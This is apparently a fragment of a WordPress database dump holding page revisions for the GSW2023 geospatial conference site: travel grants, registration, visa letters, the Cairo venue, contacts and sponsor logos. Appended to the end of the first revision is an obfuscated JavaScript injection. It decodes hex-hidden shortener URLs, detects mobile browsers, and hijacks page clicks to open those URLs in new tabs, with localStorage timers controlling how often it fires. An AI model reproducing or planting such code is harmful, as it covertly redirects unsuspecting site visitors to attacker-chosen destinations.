css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:13:43','2023-06-09 22:13:43','',3066,'https://gsw2023.com/?p=4673',0,'revision','',0),
(4674,1,'2023-06-09 22:16:19','2023-06-09 22:16:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" 